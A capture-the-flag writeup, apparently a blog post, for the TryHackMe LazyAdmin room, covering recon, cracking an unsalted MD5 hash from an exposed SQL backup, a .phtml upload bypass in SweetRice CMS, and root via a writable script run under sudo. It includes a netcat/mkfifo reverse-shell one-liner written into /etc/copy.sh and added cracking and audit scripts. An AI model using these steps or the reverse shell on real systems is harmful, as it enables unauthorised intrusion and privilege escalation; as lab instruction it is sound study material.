LazyAdmin — TryHackMe — Writeup

TonyRahmos
4 min read · Oct 21, 2020


Hello. I’m Rahmos. Here is my LazyAdmin — TryHackMe — Writeup. Check it out!

First, deploy the machine and run nmap to find the open ports.

nmap -Pn -v -T5 <ip>

[Screenshot: nmap scan output]

Two ports are open: 22 (SSH) and 80 (HTTP). (-Pn skips host discovery; -T5 is the most aggressive timing template and can drop results over a slow VPN link, so rerun with -T4 if the output looks incomplete.) Let's look at the website.

[Screenshot: the website]

It's a stock Apache web server page. Now use Gobuster to look for hidden directories.

gobuster dir -u http://<ip>:80 -w /path-to-wordlist

[Screenshot: gobuster output]

Gobuster finds a /content directory, so browse to http://<ip>/content

[Screenshot: /content]

The site under /content runs the SweetRice CMS, and its login page is http://<ip>/content/as?type=sign

[Screenshot: SweetRice login page]

We don't have credentials to log in yet, so we need another way in.

Let's brute-force hidden directories under http://<ip>/content as well:

gobuster dir -u http://<ip>/content -w /path-to-wordlist

[Screenshot: gobuster output for /content]

Browsing each of the discovered directories, /inc has an interesting file.

[Screenshot: /inc directory listing]

It's a MySQL backup file. The directory is listable, so open the folder and download the backup with wget.

Inside the dump I found the login credentials:

[Screenshot: credentials in the backup]

The password is stored as an unsalted MD5 hash. MD5 can't be "decrypted", but the unsalted hash of a common password can be looked up in a precomputed table, which is what the online "MD5 decrypt" sites do; that lookup gave me the password.

[Screenshot: cracked password]
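The same lookup done offline, as an added example that is not part of the original writeup: each wordlist candidate is hashed with md5sum and compared with the target, which is all an "online MD5 decrypt" site does against a huge precomputed list. The hash in the demo is MD5("password") and the three-word wordlist is constructed for the demo; the LazyAdmin hash itself is not reproduced here. Requires md5sum from coreutils.

```shell
#!/bin/sh
# Added example, not from the original writeup: offline wordlist attack on an
# unsalted MD5 hash, the operation an "online MD5 decrypt" site performs with a
# precomputed table. Needs md5sum (coreutils).

# looks_like_md5 <string>: true if the string has the shape of an MD5 digest,
# exactly 32 hex characters. Cheap sanity check before spending time cracking.
looks_like_md5() {
    printf '%s' "$1" | grep -qE '^[0-9a-fA-F]{32}$'
}

# crack_md5 <hex-hash> <wordlist-file>
# Prints the first wordlist entry whose MD5 equals the hash and returns 0;
# returns 1 if the wordlist is exhausted, 2 if the input is not an MD5 hash.
# The hex is lower-cased first because dumps sometimes store uppercase digests.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    wordlist="$2"
    looks_like_md5 "$target" || { echo "not an MD5 hash: $1" >&2; return 2; }
    while IFS= read -r cand || [ -n "$cand" ]; do
        # printf, not echo: echo would append a newline and hash the wrong bytes
        h=$(printf '%s' "$cand" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$cand"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Real usage: crack_md5 <hash-from-the-dump> /usr/share/wordlists/rockyou.txt
# Demo with a constructed hash (MD5 of "password") and a constructed wordlist:
if [ "$#" -eq 0 ]; then
    tmp=$(mktemp)
    printf 'admin\nletmein\npassword\n' > "$tmp"
    crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 "$tmp"   # prints: password
    rm -f "$tmp"
fi
```

Because the hash is unsalted, the same password produces the same digest everywhere, so a table built once serves every site; a per-user salt or a slow hash such as bcrypt would force the attacker back to hashing each candidate per account.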

Now log in!

We're in the admin panel. Next, let's upload a shell.

Navigate to Media -> Upload. Uploading the .php shell was refused because of its extension, so rename it to .phtml and upload that instead: the filter only looks at the extension, and on a stock Debian/Ubuntu Apache PHP setup .phtml files are executed as PHP just like .php.

[Screenshot: media upload]
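Why the rename works, as an added example that is not part of the original writeup. Two checks decide whether an upload becomes code: the application's extension filter and the web server's handler mapping. The filter functions below are my models of the behaviour the writeup observed (a deny-list that rejects .php) and of the fix (an allow-list of media extensions), not SweetRice's code; the FilesMatch line is constructed to mirror the stock Debian/Ubuntu /etc/apache2/mods-available/php*.conf, which hands every .php, .phar and .phtml file to the PHP engine.

```shell
#!/bin/sh
# Added example, not from the original writeup. Models the two checks that
# decide whether an uploaded file becomes code: the application's extension
# filter and the web server's handler mapping. The filter functions are
# hypothetical models of the upload form's behaviour as seen in the writeup.

# Constructed config line mirroring the FilesMatch block in Debian/Ubuntu's
# php*.conf: any name ending in .php, .phar or .phtml is executed as PHP.
PHP_FILESMATCH='<FilesMatch ".+\.ph(ar|p|tml)$">'

# php_handles <filename>: true if the server's FilesMatch regex matches the name.
php_handles() {
    re=$(printf '%s' "$PHP_FILESMATCH" | sed 's/.*FilesMatch "\(.*\)".*/\1/')
    printf '%s\n' "$1" | grep -qE "$re"
}

# Deny-list filter, as the upload form behaved in the writeup: blocks .php only.
denylist_allows() {
    case "$1" in *.php) return 1 ;; *) return 0 ;; esac
}

# Allow-list filter (the fix): only media extensions pass, everything else fails.
allowlist_allows() {
    case "$1" in *.png|*.jpg|*.jpeg|*.gif) return 0 ;; *) return 1 ;; esac
}

# bypasses <filter-function> <filename>: true when the filter accepts the file
# AND the server would execute it, i.e. the upload yields code execution.
bypasses() {
    "$1" "$2" && php_handles "$2"
}

# Walk a few candidate names through both filters and print the verdicts.
for name in shell.php shell.phtml shell.phar shell.php.png avatar.png; do
    for filter in denylist_allows allowlist_allows; do
        if bypasses "$filter" "$name"; then
            printf '%-16s %-16s EXECUTABLE UPLOAD\n' "$filter" "$name"
        else
            printf '%-16s %-16s safe\n' "$filter" "$name"
        fi
    done
done
```

The point of checking against the server's own regex rather than a hand-written list is that the dangerous set of extensions is whatever the handler mapping says it is; a deny-list maintained by the application will always lag behind it.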

Start a listener on our machine, then browse to the uploaded .phtml file to trigger it, and we have our shell.

nc -lvnp <port>

[Screenshot: reverse shell]

cd to /home and cat the first flag.

[Screenshot: first flag]

Now let's get root. First, upgrade to a proper TTY with Python:

python -c 'import pty; pty.spawn("/bin/bash")'

then run sudo -l to see what we are allowed to run as root:

[Screenshot: sudo -l output]

We can run Perl on backup.pl as root without a password. Let's check the contents of backup.pl:

[Screenshot: backup.pl]

It spawns a shell to execute /etc/copy.sh. Let's see what is inside copy.sh:

[Screenshot: copy.sh]
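The escalation rests on one fact: a script that root runs through sudo (backup.pl) executes another file (/etc/copy.sh) that our low-privileged user can write to. As an added example that is not part of the original writeup, the shell functions below automate that check: they pull every absolute path out of the sudo -l output, report any we can modify, and then look one level deeper at the paths referenced inside those files. The demo at the bottom builds a backup.pl and a world-writable copy.sh in a temp directory and feeds a constructed sudo -l line shaped like the one in the writeup.

```shell
#!/bin/sh
# Added example, not from the original writeup: find root-run files that the
# current user can tamper with, the pattern behind the backup.pl -> copy.sh
# escalation. Only dependencies written as absolute paths are found; a bare
# command name resolved through $PATH inside the sudo-able script needs manual review.

# writable_deps <file>: print each absolute path named inside <file> that exists
# and is writable by the current user (e.g. /etc/copy.sh inside backup.pl).
writable_deps() {
    grep -oE '/[A-Za-z0-9._/-]+' "$1" | sort -u | while IFS= read -r p; do
        if [ -e "$p" ] && [ -w "$p" ]; then
            printf '%s\n' "$p"
        fi
    done
}

# audit_sudo <sudo -l output>: for every absolute path sudo lets us run or pass
# as an argument, report it if we can write it, then report writable files it
# references in turn.
audit_sudo() {
    printf '%s\n' "$1" | grep -oE '/[A-Za-z0-9._/-]+' | sort -u | while IFS= read -r p; do
        [ -r "$p" ] || continue
        if [ -w "$p" ]; then
            printf 'WRITABLE target:     %s\n' "$p"
        fi
        if [ -f "$p" ]; then
            writable_deps "$p" | sed 's|^|WRITABLE dependency: |'
        fi
    done
}

# Real usage on the box:   audit_sudo "$(sudo -l)"
# Constructed demo: a backup.pl that invokes a world-writable copy.sh, both in a temp dir.
if [ "$#" -eq 0 ]; then
    d=$(mktemp -d)
    printf '#!/bin/sh\n# placeholder\n' > "$d/copy.sh" && chmod 666 "$d/copy.sh"
    printf 'system("sh", "%s/copy.sh");\n' "$d" > "$d/backup.pl"
    audit_sudo "User www-data may run the following commands:
    (ALL) NOPASSWD: /usr/bin/perl $d/backup.pl"
    rm -rf "$d"
fi
```

A hit on the WRITABLE dependency line is exactly the situation exploited next: whatever we put in that file runs as root the moment the sudo-able script is invoked.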

It's a netcat reverse-shell one-liner: a named pipe feeds /bin/sh its input from the nc connection and sends the output back. This only helps if we can write to the file, so check with ls -l /etc/copy.sh first; if it is writable, overwrite it with the same one-liner pointing at our own IP and port. I used echo, redirected onto the file:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f' > /etc/copy.sh

copy.sh now contains our payload. Start a listener on our machine, then run backup.pl through sudo:

sudo /usr/bin/perl /home/itguy/backup.pl

Back on the listener, we have a root shell!

[Screenshot: root shell]

Now grab the root flag!

[Screenshot: root.txt]

The end.

HAPPY HACKING
